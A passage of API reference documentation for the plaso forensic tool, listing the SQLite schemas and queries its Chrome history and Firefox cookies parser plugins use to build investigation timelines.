INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL, mime_type VARCHAR(255) NOT NULL DEFAULT "", original_mime_type VARCHAR(255) NOT NULL DEFAULT "", guid VARCHAR NOT NULL DEFAULT \'\', hash BLOB NOT NULL DEFAULT X\'\', http_method VARCHAR NOT NULL DEFAULT \'\', tab_url VARCHAR NOT NULL DEFAULT \'\', tab_referrer_url VARCHAR NOT NULL DEFAULT \'\', site_url VARCHAR NOT NULL DEFAULT \'\', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}]

class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPluginBases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin

SQLite parser plugin for Google Chrome 8 - 25 history database files.

DATA_FORMAT = 'Google Chrome 8 - 25 history SQLite database file'

NAME = 'chrome_8_history'

ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs)Parses a file downloaded row.

Parameters




QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT id, full_path, url, start_time, received_bytes, total_bytes FROM downloads', 'ParseFileDownloadedRow')]



REQUIRED_STRUCTURE = {'downloads': frozenset({'full_path', 'id', 'received_bytes', 'start_time', 'total_bytes', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}

SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}]

plaso.parsers.sqlite_plugins.firefox_cookies module

SQLite parser plugin for Mozilla Firefox cookies database files.

class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventDataBases: plaso.containers.events.EventData

Firefox Cookie event data.

cookie_namename field of the cookie.

Type str

datacookie data.

Type str

httponlyTrue if the cookie cannot be accessed through client side script.

Type bool

hosthostname of host that set the cookie value.

Type str

pathURI of the page that set the cookie.

Type str


Type bool

DATA_TYPE = 'firefox:cookie:entry'

class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Mozilla Firefox cookies database files.

DATA_FORMAT = 'Mozilla Firefox cookies SQLite database file'

NAME = 'firefox_cookies'

ParseCookieRow(parser_mediator, query, row, **unused_kwargs)Parses a cookie row.

Parameters






QUERIES = [('SELECT id, baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly FROM moz_cookies', 'ParseCookieRow')]

REQUIRED_STRUCTURE = {'moz_cookies': frozenset({'baseDomain', 'creationTime', 'expiry', 'host', 'id', 'isHttpOnly', 'isSecure', 'lastAccessed', 'name', 'path', 'value'})}

SCHEMAS = [{'moz_cookies': 'CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement))'}]

URLS = ['https://hg.mozilla.org/mozilla-central/file/349a2f003529/netwerk/cookie/nsCookie.h']

